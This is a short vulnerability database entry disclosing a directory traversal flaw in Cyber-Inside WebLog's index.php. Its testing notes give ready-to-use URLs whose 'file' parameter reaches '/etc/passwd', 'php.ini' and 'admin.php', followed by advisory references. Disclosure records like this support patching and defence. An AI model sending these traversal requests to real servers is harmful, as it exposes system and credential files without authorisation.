Cyber-Inside WebLog index.php showarticles Action file Variable Traversal Arbitrary File Access

2007-03-15T06:33:59
ID OSVDB:34043
Type osvdb
Reporter OSVDB
Modified 2007-03-15T06:33:59

Description

Manual Testing Notes

http://localhost/blog/index.php?how=showarticles&file=../../../../windows/php.ini
http://localhost/blog/index.php?show=showarticles&file=../../../../etc/passwd
http://localhost/blog/index.php?show=showarticles&file=../admin.php

References:

Secunia Advisory ID: 24521
Other Advisory URL: http://milw0rm.com/exploits/3484
ISS X-Force ID: 32998
FrSIRT Advisory: ADV-2007-0967
CVE-2007-1487
Bugtraq ID: 22995